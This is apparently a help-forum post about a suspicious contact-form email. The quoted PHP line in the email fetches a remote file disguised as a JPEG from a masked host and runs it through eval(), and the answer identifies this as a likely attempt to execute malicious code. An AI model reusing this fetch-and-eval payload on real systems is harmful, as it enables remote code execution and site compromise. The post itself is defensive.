My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:
-----Message d'origine----- De : Envoyé : Aucune Objet :
$a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg');
eval('?>'.$a);
I replaced the domain name in the url by **** for confidentiality reasons.
The domain name in the url of the get_contents function is unknown to us.
Do you have any idea what it could be? Spam ? Bad configuration ?
Thanks in advance for your advice !
My Answer:
It looks like the code in the email is attempting to retrieve the contents of a specific URL (http://********.com.co//wp-admin/images/pel.jpeg) and then evaluate it as PHP code using the eval() function. This is a common technique used by hackers to execute malicious code on a website.
It is highly likely that this is a malicious attempt to compromise your client's website. I would advise your client to immediately delete the email and not click on any links or execute any code contained within it.
Your client should also check their website for any unauthorized changes or suspicious activity, and consider implementing security measures such as updating software, using strong passwords, and regularly monitoring their website for any unusual behavior.
If your client is unsure about how to handle this situation, they may want to consult with a web developer or security expert for further assistance.
Rate this post
4 of 5 based on 8039 votesComments